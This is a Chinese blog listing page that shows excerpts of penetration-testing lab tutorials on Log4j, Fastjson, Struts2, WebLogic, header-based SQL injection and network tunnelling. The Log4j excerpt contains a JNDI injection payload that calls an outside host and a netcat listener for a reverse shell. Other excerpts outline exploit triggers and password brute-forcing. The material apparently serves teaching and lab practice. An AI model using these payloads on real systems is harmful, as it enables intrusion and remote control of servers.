自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

1

  • 博客(16)
  • 问答 (1)
  • 收藏
  • 关注

原创 Spring-boot Actuator H2 RCE复现

Spring Boot Actuator H2 RCE复现

2022-09-07 11:32:22 1965 1

原创 渗透测试中如何辨别网站使用的脚本语言

渗透测试的过程中,通过判断网站的脚本语言来进一步扩展攻击面。

2022-07-21 21:51:58 3870 2

原创 Struts2 S2-046漏洞复现 (CVE-2017-5638)

一:漏洞介绍名称: struts2-046 远程代码执行 (CVE-2017-5638)描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导

2022-05-27 22:42:53 3605

原创 Weblogic任意文件上传漏洞复现

一:漏洞编号(CVE-2018-2894)二:受影响版本weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3三:环境搭建使用docker搭建vulhub环境1.cd /vulhub/weblogic/CVE-2018-2894 进入靶场环境2.docker-compose up -d 启动靶场3.docker-compose logs | grep password 查看管理员账号密码

2022-05-27 18:11:09 429

原创 x-forwarded-for手工注入(超详细)

使用靶场来进行演示。访问靶场后看到的是一个常见的后台的登录框,第一步肯定是先试一下看看有没有弱口令咯,试了几个发现并不存在弱口令,但是发现网站有一串乱码的弹窗如下虽然是乱码,但是看到里面有ip,头发短见识多得我就想到了这大概率是记录下了我本机的ip(这里的ip是开了隧道的不是我的哦~)让我们来抓包看一下这里可以看到转编码之后确实是记录了我的ip,但是在请求包中没有发现xff头,就很奇怪,自己加上。发现xff头的内容是可以随便控制的,下面可以看到输入单引号是报错的,那就直接尝...

2022-05-12 23:22:02 1112

原创 Fastjson反序列化漏洞复现(实战案例)

漏洞介绍FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据

2022-04-19 15:50:20 17985 3

原创 Log4j拿shell(vulfocus靶场详细教程)

直接在vulfocus起一个靶场环境burp抓包,看到提示参数是payloaddnslog验证先来使用dnslog验证一下${jndi:ldap://“ip”/poc} 这里的ip是dnslog获取到的域名生成的payload需要url编码,下面可以看到验证成功,说明存在log4j,然后我们反弹shell拿权限反弹shellvps开启监听nc -lvnp 2333使用工具:https://github.com/Zard-ethan/JNDI-I.

2022-04-16 23:22:40 4573

原创 磨人的新版Burp不兼容1.8版本解决办法

新版burp真的长在了我的审美上~不愧是神器,前不久抛弃了我的旧爱,安装了新版Burp,正当我满心欢喜的准备扒开她的衣服一赏风光时却被一个报错挡住了(这谁忍得住?)以前没遇到过,先上度娘查一查,大概意思就是jdk版本太低了,建议15版本以上,后来经过测试,其实9+版本就可以兼容新版本Burp,很好,安了一个jdk11,可以很舒服的使用了,但是高兴太早了,高版本的jdk有很多工具都不兼容,导致我现在使用一些工具还得换回jdk1.8,这无疑降低了我鼠标的寿命,就很烦,从网上找文章,发现并没有什么好的解决办法

2022-04-16 16:50:10 4882 1

转载 Xray详细介绍

扫描扫描:xray webscan --basic-crawler url测试:.\xray_windows_386.exe webscan --basic-crawler http://testphp.vulnweb.com/被动代理代理扮演中间人角色。1.安装浏览器代理插件:SwitchyOmega插件2.生成xray证书并安装证书.\xray_windows_386.exe genca #生成证书然后安装证书3.启动代理.\xray_win

2022-04-15 19:58:12 2767

原创 Cors跨域资源请求详解

介绍Cors全称为“跨域资源共享”(Cross-origin resource sharing),是一个W3C标准,一种浏览器机制,可实现对位于应用程序域之外的资源的受控访问,对你的应用来源(域)之外的资源(比如图像或字体)的请求称为跨域请求。那么为什么会出现Cors呢,首先要了解到同源策略,同源策略(Sameoriginpolicy)简称SOP,是一种约定,同源策略限制了网站与源域(来源)以外的资源进行交互的能力,每当跨不同来源 (域)发出请求而没有跨来源配置时,服务器将报告错误。而Cors就是通过特

2022-03-20 00:35:36 5280 2

原创 python生成字典脚本

介绍字典通常用在渗透测试爆破的过程中,可以代替我们手工去跑一些有规则的数据,例如登录框页面(脑洞放开,例如个人信息的id参数,也可以跑,进而发现越权),此时已知账号正确,密码为4位数,而且这个时候密码输入又没有太多的限制(比如次数)我们就可以一个一个的试,又不多,纯数字4位数的话也才10的四次方10000次(键盘敲冒烟都整不完)作为一名高级渗透测试工程师,当然要高级一点,可以利用python去写一个脚本,自动生成所需的密码,然后利用burp自动跑。代码1.先调用itertools模块...

2022-03-16 23:01:54 5065 2

原创 Burp联动Sqlmap插件

插件介绍sqlmap4burp++是一款兼容Windows,mac,linux多个系统平台的Burp与sqlmap联动插件这个插件嘎嘎好用,大大提升了sqlmap的效率项目地址https://github.com/c0ny1/sqlmap4burp-plus-plus安装进入burp拓展模块 点击添加 上传文件 找到下载的插件上传使用在数据包页面右击,选择对应的插件进行使用 配置好对应的参数就直接跳转到sqlmap开始运行了...

2022-03-15 22:04:06 3807 2

原创 weblogic漏洞复现

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。漏洞环境搭建项目地址:GitHub - vulhub/vulhub: Pre-Built Vulnerable Environments Based

2022-02-23 21:23:55 2207

原创 手动安装weblogical

win10手动安装weblogical准备weblogic压缩包,java包等以管理员身份运行cmd然后看到开启安装程序这里注意要选择含示例的完整安装然后这边又开始新一轮的安装,注意命令行不要关等一会之后浏览器访问http://127.0.0.1:7001/console会自动跳转到index.jsp然后进行部署,第一次访问会进行部署部署完成,账号密码就是刚刚安装时设置的,登录进...

2022-02-23 21:09:01 399

原创 安服面试点总结

目录3389无法连接的几种情况二次注入报错注入的函数基于格式错误的报错(xpath语法错误)基于主键重复错误堆叠注入判断出网站的CMS对渗透的意义一个成熟并且相对安全的CMS,渗透时扫目录的意义?mysql注入点,用工具对目标站直接写入一句话,需要哪些条件?1.3389无法连接的几种情况端口没有开放端口被修改了被拦截了没出网(处于内网(需要进行端口转发))2.二次注入恶意数据经过一些转义函数(get_magic_quotes_gpc)的

2022-02-22 02:57:10 7813

原创 内网渗透工具Earthworm简单使用

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。项目地址:https://github.com/idlefire/ew打开项目的文件,里面非常清楚的写了如何使用,我们

2022-02-15 21:49:47 3303 1

空空如也

sqlmap如何刷src

2022-01-19

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除